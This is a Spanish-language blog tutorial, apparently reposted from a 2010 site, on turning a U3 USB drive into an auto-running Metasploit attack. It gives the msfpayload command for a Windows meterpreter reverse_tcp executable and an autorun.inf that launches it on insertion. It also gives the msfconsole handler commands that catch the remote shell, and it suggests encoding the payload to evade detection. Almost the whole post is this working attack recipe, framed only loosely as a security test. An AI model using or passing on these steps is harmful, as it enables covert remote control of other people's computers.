Ataque USB U3 con MetaSploit

En 4 simples pasos vamos a armar un USB U3, para que al ser conectado a una PC, realice una conexión reversa con meterpreter.

La idea es generar con MetaSploit un ejecutable con un payload que genere una conexión reversa al conectar el USB a la PC. Para grabar el payload dentro del U3, vamos a utilizar el programa Universal Customizer.


1. Generamos el Payload con MetaSploit

En este caso vamos a crear un ejecutable con una conexión reversa de meterpreter:

./msfpayload windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > malware.exe

Por supuesto que podemos utilizar cualquier otro payload, como también encodearlo para que sea más difícil su detección.


2. Creamos nuestra ISO

Una vez que bajamos y descomprimimos Universal Customizer, copiamos malware.exe al directorio "U3CUSTOM" y creamos el archivo "autorun.inf" con el siguiente contenido:

[AutoRun] open=malware.exe

Luego ejecutamos "ISOCreate.cmd" y dentro del directorio "BIN" se va a crear nuestra ISO con el nombre "U3CUSTOM.ISO". Si no creamos nuestra ISO, Universal Customizer va a utilizar la "U3CUSTOM.ISO" que ya viene dentro del paquete, con una versión de Hacksaw.


3. Grabamos la ISO

Luego corremos Universal Customizer y vamos siguiendo los pasos:


Al finalizar, quitamos el USB y cuando lo volvamos a conectar ya tendrá nuestro payload adentro.


4. Escuchamos por la Conexión Reversa

Para finalizar, debemos dejar un listener escuchando por la conexión reversa del payload que grabamos en el U3:

./msfconsole use exploit/multi/handler set PAYLAOD windows/meterpreter/reverse_tcp set LHOST 1.1.1.1 set LPORT 443 set ExitOnSession false exploit -j

Eso es todo, una interesante prueba de concepto para probar la seguridad de la PC de un usuario.

Información extraída de:
http://www.kungfoosion.com/2010/06/ataque-usb-u3-con-metasploit.html

Comentarios

Entradas populares de este blog

Trinity Rescue Kit: Tutorial para eliminar la contraseña de administrador en Windows

Cómo extraer el handshake WPA/WPA2 de archivos de captura grandes

Crear un Fake AP en muy pocos pasos con Gerix